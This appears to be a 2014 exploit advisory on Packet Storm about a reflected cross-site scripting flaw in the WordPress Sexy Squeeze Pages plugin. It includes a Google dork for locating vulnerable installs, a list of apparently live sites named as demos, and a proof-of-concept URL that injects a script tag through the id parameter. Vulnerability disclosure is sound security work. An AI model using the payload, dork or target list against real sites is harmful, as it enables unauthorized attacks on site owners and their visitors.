WordPress Sexy Squeeze Pages plugin suffers from a cross site scripting vulnerability.
8793ad38d9dfbe4490552ccd9b80858ec761b30f9e6cba3c99073dba85c6703dWordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress (Sexy Squeeze Pages) Plugin
|~Software: http://instasqueeze.com/jv/
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:wp-content/plugins/instasqueeze
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| DEMO :
http://instasqueeze.com ( Official )
http://gogglerank.com/
http://kangenwaterhq.com
http://visualhandsconnect.com
http://cynthialeecreations.com
==============[Exploitation]===============================
/instasqueeze/lp/index.php
id parameter is ( index.php ) not safe.
HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed